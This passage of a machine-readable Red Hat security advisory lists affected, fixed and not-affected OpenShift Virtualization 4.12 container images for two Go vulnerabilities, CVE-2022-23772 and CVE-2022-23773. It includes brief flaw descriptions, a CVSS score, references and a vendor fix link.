"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053532", }, ], notes: [ { category: "description", text: "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", title: "Vulnerability description", }, { category: "summary", text: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23772", }, { category: "external", summary: "RHBZ#2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23772", url: "https://www.cve.org/CVERecord?id=CVE-2022-23772", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-01-19T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", }, { cve: "CVE-2022-23773", cwe: { id: "CWE-1220", name: "Insufficient Granularity of Access Control", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053541", }, ], notes: [ { category: "description", text: "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", title: "Vulnerability description", }, { category: "summary", text: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", 